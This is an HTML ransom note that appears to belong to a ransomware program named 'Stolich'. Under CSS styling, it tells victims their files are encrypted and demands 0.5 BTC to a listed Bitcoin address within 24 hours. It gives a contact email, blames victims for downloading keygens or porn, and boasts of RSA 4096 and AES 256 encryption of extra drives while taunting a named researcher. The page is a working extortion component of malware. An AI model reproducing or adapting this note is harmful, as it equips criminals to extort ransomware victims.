<html><head>
<style>
h1 {
	font-family: Arial,Helvetica Neue,Helvetica,sans-serif;
	font-size: 24px;
	font-style: normal;
	font-variant: normal;
	font-weight: 500;
	line-height: 26.4px;
}
h3 {
	font-family: Arial,Helvetica Neue,Helvetica,sans-serif;
	font-size: 14px;
	font-style: normal;
	font-variant: normal;
	font-weight: 500;
	line-height: 15.4px;
}
p {
	font-family: Arial,Helvetica Neue,Helvetica,sans-serif;
	font-size: 14px;
	font-style: normal;
	font-variant: normal;
	font-weight: 400;
	line-height: 20px;
        color: white;
}
blockquote {
	font-family: Arial,Helvetica Neue,Helvetica,sans-serif;
	font-size: 21px;
	font-style: normal;
	font-variant: normal;
	font-weight: 400;
	line-height: 30px;
}
pre {
	font-family: Arial,Helvetica Neue,Helvetica,sans-serif;
	font-size: 13px;
	font-style: normal;
	font-variant: normal;
	font-weight: 400;
	line-height: 18.5667px;
}

/* This text is in Arial */
.class { 
	font-family: Arial,Helvetica Neue,Helvetica,sans-serif; 
}

style>

{ margin: 0; padding: 0; }

html { 
        background: url('Desktop-Money-Wallpaper-HD-1920x1080-1.jpg') no-repeat center center fixed; 
        -webkit-background-size: cover;
        -moz-background-size: cover;
        -o-background-size: cover;
        background-size: cover;
}

div.transbox {
  margin: 30px;
  background-color: #ffffff;
  border: 1px solid black;
  opacity: 0.6;
  filter: alpha(opacity=60); /* For IE8 and earlier */
}

div.transbox p {
  margin: 5%;
  font-weight: bold;
  color: #000000;
}


</style>

</head>
<body>
	<font face="Arial">
		<hr><br>
			<div class="transbox">
				<center>
					<img src="warning.png" height="200" width="200">
					<h1 color="white" align="center"> Feel the Wrath of Stolich </h1>
					<h2 color="white" align="center"> Now make me rich! </h2>
					
					<br><hr><br>

					<h2 color="white" align="center"> Send 0.5 BTC to <b>1F1tAaz5x1HUXrCNLbtMDqcw6o5GNn4xqX</b></h2>
					<br>
					<h3>Use a service named Blockchain.info for sending</h3>
					<br>
					<h3 color="white" align="center"> Also, attach a Public Note with the transaction which should contain your umm.. Identifier or email me</h3>
					<br><hr>
					<p>
					Now, for why you were infected:<br>
					I - personally as a human being do not care about your data,<br>
					neither do I mean to bring ill will to anybody or cause any<br>
					(serious) damage. Do kindly note that viruses do not come from thin<br>
					air and is inflicted through silly or pretentious acts.<br>
					<br>
					This virus has not come from a legit, secure file but from<br>
					some keygen or porn you may have downloaded off the internet without<br>
					thinking, so a piece of advice - please think before you download.<br>
					<br>
					If for some reason you cannot pay (and please be honest) email to<br>
					fdw0a94ur90h8@fd90ojf.c for why you cannot pay or if you think your<br>
					data has something personal (not games, but say photos of your kids e.t.c.),<br> 
					then that email is for you.<br>
					<br>
					As for everybody else, you have 24 hours (and I mean it), if not paid<br>
					Then you can kiss your data adieu.<br>
					<br>
					And to Mr. Utuku Sen, my code is open source and is visible - if you<br>
					can crack it, then congrats! but do the favour of reporting and helping<br>
					in strengtening this program and then I'll take it offline. For your "vulnurabilities"<br>
					<br>
					I use use santization to prevent XSS attacks to servers<br>
					I reset the dates to 1st January 1999 of all the files<br>
					I use ACTUAL random salts so :) <br>
					I use RSA 4096 and AES 256 (okay, doesn't matter but still<br>
					I also cause much more crypting (encrypting D:, E: and F:)<br>
					<br>
					Regards,<br>
					Me.<br>
					</p>
					<br><br>
				</center>
			</div><br>
	</font>
</body>
</html>
